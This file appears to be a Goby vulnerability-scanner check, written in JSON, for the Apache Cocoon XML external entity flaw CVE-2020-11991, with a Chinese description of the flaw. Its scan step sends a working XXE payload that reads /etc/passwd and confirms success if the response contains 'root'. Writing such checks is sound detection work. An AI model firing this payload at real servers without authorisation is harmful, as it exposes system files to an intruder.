mirror of https://github.com/qwqdanchun/Goby.git
55 lines
2.9 KiB
JSON
55 lines
2.9 KiB
JSON
{
|
||
"Name": "Apache Cocoon Xml 注入 CVE-2020-11991",
|
||
"Level": "1",
|
||
"Tags": [
|
||
"XML注入"
|
||
],
|
||
"GobyQuery": "app=\"Apache-Cocoon\"",
|
||
"Description": "9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12",
|
||
"Product": "Apache Cocoon",
|
||
"Homepage": "http://cocoon.apache.org/2.1/",
|
||
"Author": "PeiQi",
|
||
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩</span>🐑</p>",
|
||
"Recommandation": "",
|
||
"References": [
|
||
"http://wiki.peiqi.tech"
|
||
],
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/v2/api/product/manger/getInfo",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-type": "text/xml"
|
||
},
|
||
"data_type": "text",
|
||
"data": "<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName> \n<lastName>&ent;</lastName>\n</userInfo>"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "root",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"PostTime": "2021-01-22 22:24:01",
|
||
"GobyVersion": "1.8.237"
|
||
} |